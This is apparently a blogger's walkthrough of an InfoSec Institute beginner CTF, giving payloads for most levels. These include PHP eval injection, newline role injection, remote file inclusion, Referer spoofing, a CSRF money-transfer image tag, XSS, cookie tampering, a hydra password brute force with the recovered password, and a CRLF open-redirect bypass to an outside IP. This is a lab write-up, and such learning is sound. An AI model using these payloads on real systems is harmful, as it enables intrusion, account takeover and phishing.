Here another edition of n00bs infosec CTF. 13 Levels, i will add as soon as i can complete, so stay tuned and keep visiting this post. Remember first edition ?.
Level 2
A simple calculator. Need to inject something that breaks the php code and prints something like phpinfo(). After several tries with operarands with no success i think about operator must not be set with any special ‘cast’ and simple put this string to pass the level.
;phpinfo();
So this string makes eval to lauch our phpinfo even is getting error too. I think operator variable was not sanitize at all. Maybe the solution to mitigate this attack could be a very basic code snipped like:
$operator = array("+", "-", "*", "/"); // If not in array, fail. if (!in_array($_GET['operator'], $operator)) { die('FAIL!'); }
Level 3
Hint says that we have to put a newline to get our role as admin. We inject after ‘lname’ parameter:
$ curl "http://ctf.infosecinstitute.com/ctf2/exercises/ex3.php" -H "Cookie: PHPSESSID=0sik0or2grffh5uqibmildtp82" -H "Connection: keep-alive" --data "user=tunelk02&password=lalala&lname=any"%"0aadmin&email=t"%"40tt.com®ister=Register"
What happened here is that the file that saves new users set automatic role as normal user and radsline by linea when login. If we put «lname=any%0aadmin» we force to register process to save as admin. And then just login.
Level 4
Description says:
«You are confronted with a website that loads some .txt files to display content for its pages. You are thinking that it may be vulnerable. You aim to load a nice file from a remote server and share the link with unsuspecting visitors.
Your task is to successfully load a PHP file located in the root of infosecinstitute.com. The file should not exist but you must load it without getting errors and it must have the PHP file extension.»
So has to be just read instructions. Let’s test with http://infosecinstitute.com/file1.txt.php:
http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=http://infosecinstitute.com/file1.txt.php
http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=HttP://infosecinstitute.com/file1.txt.php
Well it’s detected as URL. Reading hint (case-insensitive) we notice we can change some letters a little bit withou alter the mission.
Nice. Next one?.
Level 5
«It seems you have encountered a page which requires users to login before viewing. Do some magic without having to log in.»
If we focus on top of the page we see a disabled login button, something like this:
<a class="btn btn-sm btn-info" disabled="" href="login.html">login</a>
And if we try to get login.html access, is not found. Some of the levels, IMHO, have a very poor realistic implementation. Why they don’t put a real (but restricted login.html) that can be bypassed anyway?. Only need a check of the Referer header, a request like this:
$ curl -vvv http://ctf.infosecinstitute.com/ctf2/exercises/ex5.php -H "Referer: http://ctf.infosecinstitute.com/ctf2/exercises/login.html"
Gosh, you were fast. You completed Level 5. You will be redirected to level 6 in 10 seconds.
Level 6
«It seems you have landed on a site that takes HTML tags for article’s comments. You want to exploit this by making the users perform an action on the bank.php file in the root of site.com, if they are logged in there. You want users browsers to load that page and execute the query string transferTo with the number 555 as a parameter. Go ahead.»
Hey<img src="http://site.com/bank.php?transferTo=555">Visit
Enough and works on my server.
Level 7
There are a hidden value here, injecting just ><h1>tunelko</h1>, we got:
It seems like PHP_SELF vulnerability, let’s close our quote.
'><h1>tunelko</h1>
Level 11
Presented as another blacklisted part of the website and categorized as «Vulnerability: Bypassing blacklists«. A message appears on the webpage.
We just inspect cookies and see one of them called ‘welcome’ setted to no. Just change it to ‘yes’ to bypass the ‘restriction’:
$ curl -vvv "http://ctf.infosecinstitute.com/ctf2/exercises/ex11.php" -H "User-Agent: tnlk" -H "Cache-Control: no-cache" -H "Cookie: welcome=yes"|grep lead
Now you can see a different message.
You did it again! Why did they blacklist you anyway?
Level 12
We need to find password. Another bruteforce login. On first edition they only give you a hint (cisco word) that guides you to try several combinations. Now just google for the first dictionary with «filetype:lst password» query as search.
Ok, we get first position on first page an openwall common words. How to attack this time? We can beat it several ways: hydra, burp intruder, … As last time i did it with burp, let’s change to hydra this time. We download openwall dictionary on the same directory and start hydra tool with this parameters:
Host: ctf.infosecinstitute.com Method: http-form-post Form action: "/ctf2/exercises/ex12.php:username=admin&password=^PASS^&logIn=Login:Incorrect username or password combination." login for admin with Password file downloaded before. -l admin -P password-2011.lst With 10 threads, wait for 30 and save output to log. -t 10 -w 30 -o log * Notice post parameters inside and incorrect response for invalid users.
$ hydra ctf.infosecinstitute.com http-form-post "/ctf2/exercises/ex12.php:username=admin&password=^PASS^&logIn=Login:Incorrect username or password combination." -l admin -P password-2011.lst -t 10 -w 30 -o log Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2015-06-26 19:21:23 [DATA] max 10 tasks per 1 server, overall 64 tasks, 3546 login tries (l:1/p:3546), ~5 tries per task [DATA] attacking service http-post-form on port 80 [80][http-post-form] host: ctf.infosecinstitute.com login: admin password: princess 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2015-06-26 19:21:49
Ok, finished in few seconds. Login is admin and password is princess.
Level 13
Text on this level says …
«Hmm, it seems that level thirteen is redirecting to this page. Why do not you analyze the redirect and search if the redirect is validated thoroughly. If not, you want to redirect to a page on a remote server and send links to people fooling them to think they are accessing a different domain.»
If you see the menu link you can see a GET parameter redirect. This parameter is the key to succcessfully achieve that they are askin for: redirect to some page.
GET /ctf2/exercises/ex13.php?redirect=http://104.131.38.172/file.html HTTP/1.1
Not so fast … Seems they are filtering http protocol somehow, an ugly sentence inform us about it: Bad Redirect Parameter.
What technique we could use to bypass it? First i have tried case-sensitive, but doesn’t work. Then i remember some old-tricky one for servers that has this vulnerability. Http splitting is one of the one that can bypass the filter. It’s only a new line represented with hexadecimal values (%0a%0d) on GET request. As OWASP says on wikipage:
Exploits a lack of input sanitization which allows an intruder to insert CR and LF characters into the headers of the application response and to 'split' that answer into two different HTTP messages.
So we can try it:
http://ctf.infosecinstitute.com/ctf2/exercises/ex13.php?redirect=%0d%0a%20http://104.131.38.172/file.html
Now it works. Also we can put some other protocol on server we can manage and will work too.
More info: http://ctf.infosecinstitute.com/ctf2/
Level3 changed — this should work though:
curl -X POST http://ctf.infosecinstitute.com/ctf2/exercises/ex3.php -H «Cookie: PHPSESSID=YOURSESSIONHERE» -H «Connection: keep-alive» –data «user=YOURUSER&password=password&lname=admin%0arole:admin&email=admin%40anywhere.com®ister=Register»
0x00